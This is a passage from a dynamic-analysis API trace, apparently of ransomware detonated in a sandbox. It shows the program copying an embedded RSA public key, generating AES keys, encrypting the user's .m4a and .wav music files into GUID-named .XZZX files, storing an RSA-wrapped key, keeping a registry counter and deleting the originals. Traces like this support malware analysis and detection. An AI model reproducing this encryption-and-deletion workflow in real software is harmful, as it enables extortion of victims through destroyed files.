lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4bce438*=0x5, lpOverlapped=0x0) returned 1 [0051.629] SetFilePointer (in: hFile=0x614, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x100d6 [0051.629] WriteFile (in: hFile=0x614, lpBuffer=0x4bcf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: lpBuffer=0x4bcf860*, lpNumberOfBytesWritten=0x4bce438*=0x12, lpOverlapped=0x0) returned 1 [0051.629] SetFilePointer (in: hFile=0x614, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x100e8 [0051.629] WriteFile (in: hFile=0x614, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4bce438*=0x5, lpOverlapped=0x0) returned 1 [0051.629] SetFilePointer (in: hFile=0x614, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x100ed [0051.629] SetErrorMode (uMode=0x1) returned 0x1 [0051.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.629] OutputDebugStringW (lpOutputString="end") [0051.629] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wàVâ\x03`Õ¼\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x4bcdbf4, pcbBinary=0x4bcd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4bcdbf4, pcbBinary=0x4bcd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.629] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x4bcdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x4bcd3dc, pcbStructInfo=0x4bcd3d8 | out: pvStructInfo=0x4bcd3dc, pcbStructInfo=0x4bcd3d8) returned 1 [0051.630] CryptAcquireContextW (in: phProv=0x4bcd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4bcd3e4*=0x3e439f8) returned 1 [0051.630] CryptImportPublicKeyInfo (in: hCryptProv=0x3e439f8, dwCertEncodingType=0x1, pInfo=0x42e13d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1400*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1408*, PublicKey.cUnusedBits=0x0), phKey=0x4bcd3ec | out: phKey=0x4bcd3ec*=0x3e284b8) returned 1 [0051.630] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.631] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.631] CryptEncrypt (in: hKey=0x3e284b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x4bcd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x4bcd3f0*=0x80) returned 1 [0051.631] CryptEncrypt (in: hKey=0x3e284b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43a80*, pdwDataLen=0x4bcd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43a80*, pdwDataLen=0x4bcd3e8*=0x80) returned 1 [0051.631] WriteFile (in: hFile=0x614, lpBuffer=0x3e43a80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: lpBuffer=0x3e43a80*, lpNumberOfBytesWritten=0x4bce438*=0x80, lpOverlapped=0x0) returned 1 [0051.631] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.631] WriteFile (in: hFile=0x614, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4bce438*=0x5, lpOverlapped=0x0) returned 1 [0051.632] GetUserNameW (in: lpBuffer=0x4bce1f8, pcbBuffer=0x4bcdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x4bcdfe0) returned 1 [0051.632] wsprintfW (in: param_1=0x4bcdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.632] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4bcdfe4 | out: phkResult=0x4bcdfe4*=0x630) returned 0x0 [0051.632] RegQueryValueExW (in: hKey=0x630, lpValueName="E1010314", lpReserved=0x0, lpType=0x4bcdfd8, lpData=0x4bcdfec, lpcbData=0x4bcdfdc*=0x4 | out: lpType=0x4bcdfd8*=0x4, lpData=0x4bcdfec*=0x58, lpcbData=0x4bcdfdc*=0x4) returned 0x0 [0051.632] RegCloseKey (hKey=0x630) returned 0x0 [0051.632] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4bcdfe8 | out: phkResult=0x4bcdfe8*=0x630) returned 0x0 [0051.632] RegSetValueExW (in: hKey=0x630, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x4bcdfec*=0x59, cbData=0x4 | out: lpData=0x4bcdfec*=0x59) returned 0x0 [0051.632] RegCloseKey (hKey=0x630) returned 0x0 [0051.633] VirtualFree (lpAddress=0x3ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.633] VirtualFree (lpAddress=0x3ee0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.633] CloseHandle (hObject=0x614) returned 1 [0051.635] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.636] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.636] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JKoqX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jkoqx.wav")) returned 1 [0051.636] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JKoqX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jkoqx.wav")) returned 0 Thread: id = 184 os_tid = 0xb4c [0050.440] lstrcpyA (in: lpString1=0x4ccfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.441] lstrcpyW (in: lpString1=0x4ccf460, lpString2="yV_ r.m4a" | out: lpString1="yV_ r.m4a") returned="yV_ r.m4a" [0050.441] lstrcpyW (in: lpString1=0x4cce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.441] SetErrorMode (uMode=0x1) returned 0x1 [0050.441] lstrcpyW (in: lpString1=0x4ccf860, lpString2="yV_ r.m4a" | out: lpString1="yV_ r.m4a") returned="yV_ r.m4a" [0050.441] CoCreateGuid (in: pguid=0x4cce440 | out: pguid=0x4cce440*(Data1=0x37e5810b, Data2=0xa152, Data3=0x4bc2, Data4=([0]=0xbb, [1]=0x93, [2]=0x37, [3]=0xc7, [4]=0x2f, [5]=0x1a, [6]=0xce, [7]=0xb))) returned 0x0 [0050.441] wsprintfW (in: param_1=0x4ccec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yV_ r.m4a") returned 49 [0050.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x4ccfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.441] wsprintfW (in: param_1=0x4cce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3DAB40862FBD462437E5810B348A2A6C.XZZX") returned 77 [0050.441] StrStrW (lpFirst="yV_ r.m4a", lpSrch="XZZX") returned 0x0 [0050.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yV_ r.m4a", dwFileAttributes=0x20) returned 1 [0050.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yV_ r.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yv_ r.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ec [0050.441] ReadFile (in: hFile=0x5ec, lpBuffer=0x42e9120, nNumberOfBytesToRead=0x3eef, lpNumberOfBytesRead=0x4cce418, lpOverlapped=0x0 | out: lpBuffer=0x42e9120*, lpNumberOfBytesRead=0x4cce418*=0x3eef, lpOverlapped=0x0) returned 1 [0050.442] CloseHandle (hObject=0x5ec) returned 1 [0050.442] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0050.442] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0050.442] SetErrorMode (uMode=0x1) returned 0x1 [0050.442] lstrcpyW (in: lpString1=0x4cce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.442] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e434a8) returned 1 [0050.445] CryptGenKey (in: hProv=0x3e434a8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28538) returned 1 [0051.705] CryptExportKey (in: hKey=0x3e28538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x4cce41c | out: pbData=0x0*, pdwDataLen=0x4cce41c*=0x94) returned 1 [0051.705] CryptExportKey (in: hKey=0x3e28538, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x4cce41c | out: pbData=0x3f00000*, pdwDataLen=0x4cce41c*=0x94) returned 1 [0051.705] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.706] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.707] CryptDestroyKey (hKey=0x3e28538) returned 1 [0051.707] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3DAB40862FBD462437E5810B348A2A6C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3dab40862fbd462437e5810b348a2a6c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0051.707] WriteFile (in: hFile=0x618, lpBuffer=0x42e9120*, nNumberOfBytesToWrite=0x3eef, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x42e9120*, lpNumberOfBytesWritten=0x4cce438*=0x3eef, lpOverlapped=0x0) returned 1 [0051.708] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3eef [0051.708] WriteFile (in: hFile=0x618, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4cce438*=0x5, lpOverlapped=0x0) returned 1 [0051.708] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ef4 [0051.708] WriteFile (in: hFile=0x618, lpBuffer=0x4ccf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x4ccf860*, lpNumberOfBytesWritten=0x4cce438*=0x12, lpOverlapped=0x0) returned 1 [0051.708] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3f06 [0051.708] WriteFile (in: hFile=0x618, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4cce438*=0x5, lpOverlapped=0x0) returned 1 [0051.708] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3f0b [0051.709] SetErrorMode (uMode=0x1) returned 0x1 [0051.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.709] OutputDebugStringW (lpOutputString="end") [0051.709] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`ÕÌ\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x4ccdbf4, pcbBinary=0x4ccd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4ccdbf4, pcbBinary=0x4ccd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.709] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x4ccdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x4ccd3dc, pcbStructInfo=0x4ccd3d8 | out: pvStructInfo=0x4ccd3dc, pcbStructInfo=0x4ccd3d8) returned 1 [0051.709] CryptAcquireContextW (in: phProv=0x4ccd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4ccd3e4*=0x3e43c18) returned 1 [0051.710] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43c18, dwCertEncodingType=0x1, pInfo=0x42e1160*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e1190*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e1198*, PublicKey.cUnusedBits=0x0), phKey=0x4ccd3ec | out: phKey=0x4ccd3ec*=0x3e28538) returned 1 [0051.710] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.711] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.711] CryptEncrypt (in: hKey=0x3e28538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x4ccd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x4ccd3f0*=0x80) returned 1 [0051.711] CryptEncrypt (in: hKey=0x3e28538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43ca0*, pdwDataLen=0x4ccd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43ca0*, pdwDataLen=0x4ccd3e8*=0x80) returned 1 [0051.711] WriteFile (in: hFile=0x618, lpBuffer=0x3e43ca0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x3e43ca0*, lpNumberOfBytesWritten=0x4cce438*=0x80, lpOverlapped=0x0) returned 1 [0051.711] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.711] WriteFile (in: hFile=0x618, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4cce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4cce438*=0x5, lpOverlapped=0x0) returned 1 [0051.711] GetUserNameW (in: lpBuffer=0x4cce1f8, pcbBuffer=0x4ccdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x4ccdfe0) returned 1 [0051.712] wsprintfW (in: param_1=0x4ccdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.712] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4ccdfe4 | out: phkResult=0x4ccdfe4*=0x61c) returned 0x0 [0051.712] RegQueryValueExW (in: hKey=0x61c, lpValueName="E1010314", lpReserved=0x0, lpType=0x4ccdfd8, lpData=0x4ccdfec, lpcbData=0x4ccdfdc*=0x4 | out: lpType=0x4ccdfd8*=0x4, lpData=0x4ccdfec*=0x5a, lpcbData=0x4ccdfdc*=0x4) returned 0x0 [0051.712] RegCloseKey (hKey=0x61c) returned 0x0 [0051.712] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4ccdfe8 | out: phkResult=0x4ccdfe8*=0x61c) returned 0x0 [0051.712] RegSetValueExW (in: hKey=0x61c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x4ccdfec*=0x5b, cbData=0x4 | out: lpData=0x4ccdfec*=0x5b) returned 0x0 [0051.712] RegCloseKey (hKey=0x61c) returned 0x0 [0051.712] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.713] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.713] CloseHandle (hObject=0x618) returned 1 [0051.714] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.715] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.715] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yV_ r.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yv_ r.m4a")) returned 1 [0051.715] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yV_ r.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yv_ r.m4a")) returned 0 Thread: id = 185 os_tid = 0xb1c [0050.558] lstrcpyA (in: lpString1=0x48efc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.558] lstrcpyW (in: lpString1=0x48ef460, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.558] lstrcpyW (in: lpString1=0x48ee860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.558] SetErrorMode (uMode=0x1) returned 0x1 [0050.558] lstrcpyW (in: lpString1=0x48ef860, lpString2="Z9ycP6znphCfb.m4a" | out: lpString1="Z9ycP6znphCfb.m4a") returned="Z9ycP6znphCfb.m4a" [0050.558] CoCreateGuid (in: pguid=0x48ee440 | out: pguid=0x48ee440*(Data1=0x4eb31b32, Data2=0x544d, Data3=0x47a5, Data4=([0]=0xae, [1]=0x48, [2]=0x2a, [3]=0x49, [4]=0xf7, [5]=0x4e, [6]=0x98, [7]=0x36))) returned 0x0 [0050.558] wsprintfW (in: param_1=0x48eec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a") returned 57 [0050.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x48efee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.558] wsprintfW (in: param_1=0x48ee450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\70CB960A1797B0A14EB31B321C2694E9.XZZX") returned 77 [0050.558] StrStrW (lpFirst="Z9ycP6znphCfb.m4a", lpSrch="XZZX") returned 0x0 [0050.558] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a", dwFileAttributes=0x20) returned 1 [0050.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e4 [0050.559] ReadFile (in: hFile=0x5e4, lpBuffer=0x4326f58, nNumberOfBytesToRead=0x175f9, lpNumberOfBytesRead=0x48ee418, lpOverlapped=0x0 | out: lpBuffer=0x4326f58*, lpNumberOfBytesRead=0x48ee418*=0x175f9, lpOverlapped=0x0) returned 1 [0050.560] CloseHandle (hObject=0x5e4) returned 1 [0050.560] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0050.560] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0050.561] SetErrorMode (uMode=0x1) returned 0x1 [0050.561] lstrcpyW (in: lpString1=0x48ee358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.561] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e43640) returned 1 [0050.564] CryptGenKey (in: hProv=0x3e43640, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e285b8) returned 1 [0051.718] CryptExportKey (in: hKey=0x3e285b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x48ee41c | out: pbData=0x0*, pdwDataLen=0x48ee41c*=0x94) returned 1 [0051.718] CryptExportKey (in: hKey=0x3e285b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x48ee41c | out: pbData=0x3e60000*, pdwDataLen=0x48ee41c*=0x94) returned 1 [0051.718] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.719] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.719] CryptDestroyKey (hKey=0x3e285b8) returned 1 [0051.719] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\70CB960A1797B0A14EB31B321C2694E9.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\70cb960a1797b0a14eb31b321c2694e9.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0051.720] WriteFile (in: hFile=0x5f0, lpBuffer=0x4326f58*, nNumberOfBytesToWrite=0x175f9, lpNumberOfBytesWritten=0x48ee438, lpOverlapped=0x0 | out: lpBuffer=0x4326f58*, lpNumberOfBytesWritten=0x48ee438*=0x175f9, lpOverlapped=0x0) returned 1 [0051.721] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175f9 [0051.722] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, 